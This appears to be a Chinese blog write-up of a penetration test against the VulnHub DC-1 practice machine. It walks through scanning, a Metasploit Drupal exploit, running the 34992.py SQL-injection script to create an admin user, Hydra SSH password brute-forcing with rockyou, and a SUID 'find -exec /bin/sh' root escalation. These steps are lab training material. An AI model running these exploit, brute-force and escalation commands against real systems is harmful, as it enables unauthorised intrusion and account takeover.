DC-1渗透实战(详细过程)

目录

DC-1靶场机

1.主机发现

2.端口探测

3.网页信息探测

4.敏感目录扫描

5.漏洞查找和利用

漏洞查找

漏洞利用

6.获取shell

获取交互式shell

7.数据库方向渗透

看库

看表

看列

8.利用漏洞添加admin权限用户

9.九头蛇密码爆破

10.SUID提权

root权限文件查看


DC-1靶场机

官网下载 https://download.vulnhub.com/dc/DC-1.zip

下载完成后 用虚拟机打开文件

 

提示导入失败,直接点重试,导入完成后,打开DC-1虚拟机并等待,过程中别点进虚拟机里面

通过配置之后

确保DC-1 和kali处在同一网段下

下面开始渗透实战

1.主机发现

arp-scan -l

通过对比mac地址 确认目标靶机IP为192.168.20.138

2.端口探测

nmap -sV -p- 192.168.20.138

-sV 扫描目标主机端口上运行的软件信息

-p- 扫描全部端口0-65535

3.网页信息探测

80端口提供http服务 是突破口 用浏览器访问看一下

192.168.20.138:80

用whatweb 查看站点信息

whatweb -v 192.168.20.138

扫出CMS信息 CMS为Drupal

总结得到如下信息

CMS是Drupal

Apache 2.2.22

PHP 5.4.45

jQuery 1.4.4

4.敏感目录扫描

dirsearch -u 192.168.20.138 -e *

暂时未找到可以利用的信息

5.漏洞查找和利用

知道CMS之后 可以去寻找相对应的漏洞 百度一下Drupal漏洞

还是有很多漏洞的

漏洞查找

直接上Metasploit

msfconsole

查找一下Drupal的漏洞

有很多漏洞 这里我选择2018年的漏洞 时间较新 等级也高

漏洞利用

选择漏洞 进入

查看该漏洞参数模块

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

上面RHOSTS需要set,但是没有内容

设置RHOSTS

检查

设置完毕 run开始攻击

攻击成功

6.获取shell

(1)获取普通shell

(2)ls查看

发现有个flag1.txt文件 尝试查看

提示说需要配置文件

继续深入探测

获取交互式shell

以普通用户登录

python -c 'import pty;pty.spawn("/bin/bash")'

查看有无flag文件

发现只有一个flag1 打开却需要配置文件

继续深入探测

根据之前的提示看一下配置文件,配置文件有一些重要信息,有时候还能提权

百度Drupal配置文件,名字叫settings.php

find / -name settings.php

找到配置文件后 打开文件

cat /var/www/sites/default/settings.php

发现flag2 和一个数据库登录的账户和密码

flag2并没有发现我们想要的

7.数据库方向渗透

用拿到的账户密码登录数据库

成功登录数据库

看库

show databases;

看表

use drupaldb;show tables;

查看可疑的表 users

看列

select * from users;

发现密码被加密了 暂时调转方向

8.利用漏洞添加admin权限用户

drupal在7.0版本有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

searchsploit drupal

查看脚本路径

searchsploit 34992.py -p

通过URL下载脚本 保存到桌面

新建窗口运行脚本

python2 34992.py -t http://192.168.20.138/node?destination=node -u flag3 -p 123456
​

admin用户创建成功

登录之后查看信息

查看flag3信息

提示passwd文件和shadow文件有可疑信息

查看passwd文件 tac /etc/passwd

发现flag4用户

我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码

9.九头蛇密码爆破

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.20.138

ssh连接

ssh flag@192.168.20.138

查看flag4文件

提示说用相同手法爆破其他flag 去考虑提权

10.SUID提权

root权限文件查看

find / -perm -4000 2>/dev/null

用可以执行root权限的find命令找查文件 来做到SUID提权

关于SUID提权:https://www.freebuf.com/articles/web/272617.html

find / -name index.php -exec "/bin/sh" \;

whoami 查看是否提权成功

直接进入root根目录 查看最终flag

成功通关!!!

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值